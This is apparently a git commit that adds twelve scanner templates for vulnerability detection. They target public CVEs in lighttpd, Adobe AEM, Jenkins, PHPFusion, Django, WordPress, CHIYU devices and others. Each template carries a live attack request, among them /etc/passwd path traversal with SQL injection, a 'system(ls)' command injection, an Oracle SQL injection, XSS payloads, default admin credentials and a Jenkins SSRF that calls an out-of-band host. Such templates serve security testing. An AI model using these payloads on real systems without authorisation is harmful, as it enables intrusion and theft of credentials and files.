More CVEs Template

patch-1
sandeep 2021-07-26 22:48:45 +05:30
parent 5fc3ae4ef4
commit 9c66387f0f
12 changed files with 327 additions and 0 deletions

View File

@ -0,0 +1,21 @@
id: CVE-2014-2323
info:
name: Lighttpd 1.4.34 SQL injection and path traversal
description: SQL injection vulnerability in mod_mysql_vhost.c in lighttpd before 1.4.35 allows remote attackers to execute arbitrary SQL commands via the host name, related to request_check_hostname.
reference: https://download.lighttpd.net/lighttpd/security/lighttpd_sa_2014_01.txt
author: geeknik
severity: critical
tags: cve,cve2014,sqli,lighttpd
requests:
- raw:
- |+
GET /etc/passwd HTTP/1.1
Host: [::1]' UNION SELECT '/
unsafe: true
matchers:
- type: regex
regex:
- "root:[x*]:0:0:"

View File

@ -0,0 +1,28 @@
id: CVE-2016-0957
info:
name: Adobe AEM Console Disclosure
author: geeknik
description: Dispatcher before 4.1.5 in Adobe Experience Manager 5.6.1, 6.0.0, and 6.1.0 does not properly implement a URL filter, which allows remote attackers to bypass dispatcher rules via unspecified vectors.
reference: https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html
severity: high
tags: cve,cve2016,adobe,aem
requests:
- method: GET
path:
- "{{BaseURL}}/system/console?.css"
header:
- Authorization: "Basic YWRtaW46YWRtaW4K"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "Adobe"
- "java.lang"
- "(Runtime)"
condition: and

View File

@ -0,0 +1,22 @@
id: CVE-2018-1000600
info:
name: Pre-auth Fully-responded SSRF
description: A exposure of sensitive information vulnerability exists in Jenkins GitHub Plugin 1.29.1 and earlier in GitHubTokenCredentialsCreator.java that allows attackers to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.
reference:
- https://www.jenkins.io/security/advisory/2018-06-25/#SECURITY-915
- https://devco.re/blog/2019/01/16/hacking-Jenkins-part1-play-with-dynamic-routing/
author: geeknik
severity: medium
tags: cve,cve2018,jenkins,ssrf,oob
requests:
- method: GET
path:
- "{{BaseURL}}/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=http://{{interactsh-url}}"
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"

View File

@ -0,0 +1,26 @@
id: CVE-2020-24949
info:
name: PHPFusion 9.03.50 Remote Code Execution
author: geeknik
severity: high
description: Privilege escalation in PHP-Fusion 9.03.50 downloads/downloads.php allows an authenticated user (not admin) to send a crafted request to the server and perform remote command execution (RCE).
reference: https://packetstormsecurity.com/files/162852/phpfusion90350-exec.txt
tags: cve,cve2020,phpfusion,rce,php
requests:
- method: GET
path:
- "{{BaseURL}}/infusions/downloads/downloads.php?cat_id=${system(ls)}"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "infusion_db.php"

View File

@ -0,0 +1,26 @@
id: CVE-2020-9402
info:
name: Django SQL Injection
description: Django 1.11 before 1.11.29, 2.2 before 2.2.11, and 3.0 before 3.0.4 allows SQL Injection if untrusted data is used as a tolerance parameter in GIS functions and aggregates on Oracle. By passing a suitably crafted tolerance to GIS functions and aggregates on Oracle, it was possible to break escaping and inject malicious SQL.
reference: |
- https://github.com/vulhub/vulhub/tree/master/django/CVE-2020-9402
- https://docs.djangoproject.com/en/3.0/releases/security/
- https://nvd.nist.gov/vuln/detail/CVE-2020-9402
author: geeknik
severity: high
tags: cve,cve2020,django,sqli
requests:
- method: GET
path:
- "{{BaseURL}}/?q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1"
matchers:
- type: word
words:
- "DatabaseError at"
- "ORA-29257:"
- "ORA-06512:"
- "Request Method:"
condition: and

View File

@ -0,0 +1,31 @@
id: CVE-2021-24291
info:
name: Photo Gallery < 1.5.69 - Multiple Reflected Cross-Site Scripting (XSS)
author: geeknik
description: The plugin was vulnerable to Reflected Cross-Site Scripting (XSS) issues via the gallery_id, tag, album_id and theme_id GET parameters passed to the bwg_frontend_data AJAX action (available to both unauthenticated and authenticated users)
reference: https://wpscan.com/vulnerability/cfb982b2-8b6d-4345-b3ab-3d2b130b873a
severity: medium
tags: cve,cve2021,xss,wordpress,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-admin/admin-ajax.php?action=bwg_frontend_data&shortcode_id=1"%20onmouseover=alert(document.domain)//'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: header
words:
- "text/html"
- type: word
words:
- "onmouseover=alert(document.domain)//"
- "wp-content/uploads/photo-gallery"
condition: and

View File

@ -0,0 +1,26 @@
id: CVE-2021-31249
info:
name: CHIYU TCP/IP Converter devices - CRLF injection
author: geeknik
description: A CRLF injection vulnerability was found on BF-430, BF-431, and BF-450M TCP/IP Converter devices from CHIYU Technology Inc due to a lack of validation on the parameter 'redirect' available on multiple CGI components.
reference: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31249
severity: medium
tags: cve,cve2021,chiyu,crlf,iot
requests:
- method: GET
path:
- "{{BaseURL}}/man.cgi?redirect=setting.htm%0d%0a%0d%0a<script>alert(document.domain)</script>&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port=&TF_port=&B_mac_apply=APPLY"
matchers-condition: and
matchers:
- type: status
status:
- 302
- type: word
part: header
words:
- "Location: setting.htm"
- "<script>alert(document.domain)</script>"
condition: and

View File

@ -0,0 +1,28 @@
id: CVE-2021-31250
info:
name: CHIYU IoT XSS
author: geeknik
description: Several versions and models of CHIYU IoT devices are vulnerable to multiple Cross-Site Scripting flaws.
reference: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31250
severity: medium
tags: cve,cve2021,chiyu,xss,iot
requests:
- method: GET
path:
- "{{BaseURL}}/if.cgi?redirect=setting.htm&failure=fail.htm&type=ap_tcps_apply&TF_ip=443&TF_submask=0&TF_submask=%22%3E%3Cscript%3Ealert%28{{randstr}}%29%3C%2Fscript%3E&radio_ping_block=0&max_tcp=3&B_apply=APPLY"
headers:
Authorization: "Basic OmFkbWlu"
redirects: true
matchers-condition: and
matchers:
- type: word
part: header
words:
- "text/html"
- type: word
part: body
words:
- "\"><script>alert({{randstr}})</script>"

View File

@ -0,0 +1,27 @@
id: CVE-2021-31581
info:
name: Akkadian Provisioning Manager MariaDB Credentials
author: geeknik
reference:
- https://threatpost.com/unpatched-bugs-provisioning-cisco-uc/166882/
- https://www.rapid7.com/blog/post/2021/06/08/akkadian-provisioning-manager-multiple-vulnerabilities-disclosure/
severity: medium
tags: cve,cve2021,akkadian,mariadb,disclosure
requests:
- method: GET
path:
- "{{BaseURL}}/pme/database/pme/phinx.yml"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "host:"
- "name:"
- "pass:"
condition: and

View File

@ -0,0 +1,32 @@
id: CVE-2021-33221
info:
name: CommScope Ruckus IoT Controller Unauthenticated Service Details
author: geeknik
description: A 'service details' API endpoint discloses system and configuration information to an attacker without requiring authentication. This information includes DNS and NTP servers that the devices uses for time and host resolution. It also includes the internal hostname and IoT Controller version. A fully configured device in production may leak other, more sensitive information (API keys and tokens).
reference: https://www.commscope.com/globalassets/digizuite/917216-faq-security-advisory-id-20210525-v1-0.pdf
severity: medium
tags: cve,cve2021,commscope,ruckus,debug
requests:
- method: GET
path:
- "{{BaseURL}}/service/v1/service-details"
matchers-condition: and
matchers:
- type: word
part: header
words:
- "application/json"
- type: word
words:
- "message"
- "ok"
- "data"
- "dns"
- "gateway"
condition: and
- type: status
status:
- 200

View File

@ -0,0 +1,29 @@
id: CVE-2021-3377
info:
name: Ansi_up XSS
description: The npm package ansi_up converts ANSI escape codes into HTML. In ansi_up v4, ANSI escape codes can be used to create HTML hyperlinks. Due to insufficient URL sanitization, this feature is affected by a cross-site scripting (XSS) vulnerability. This issue is fixed in v5.0.0.
reference: |
- https://doyensec.com/resources/Doyensec_Advisory_ansi_up4_XSS.pdf
- https://github.com/drudru/ansi_up/commit/c8c726ed1db979bae4f257b7fa41775155ba2e27
author: geeknik
severity: medium
requests:
- raw:
- |+
GET /\u001B]8;;https://example.com"/onmouseover="alert(1)\u0007example\u001B]8;;\u0007 HTTP/1.1
Host: {{Hostname}}
Connection: close
unsafe: true
matchers-condition: and
matchers:
- type: word
part: header
words:
- "text/html"
- type: word
words:
- "com\"/onmouseover=\"alert(1)\">"

View File

@ -0,0 +1,31 @@
id: CVE-2021-33904
info:
name: Accela Civic Platform 21.1 - 'servProvCode' XSS
author: geeknik
description: In Accela Civic Platform through 21.1, the security/hostSignon.do parameter servProvCode is vulnerable to XSS.
reference: https://www.exploit-db.com/exploits/49980
severity: medium
tags: cve,cve2021,accela,xss
requests:
- method: GET
path:
- "{{BaseURL}}/security/hostSignon.do?hostSignOn=true&servProvCode=k3woq%22%5econfirm(document.domain)%5e%22a2pbrnzx5a9"
matchers-condition: and
matchers:
- type: word
part: header
words:
- "text/html"
- type: word
words:
- '"k3woq"^confirm(document.domain)^"a2pbrnzx5a9"'
- 'servProvCode'
condition: and
- type: status
status:
- 200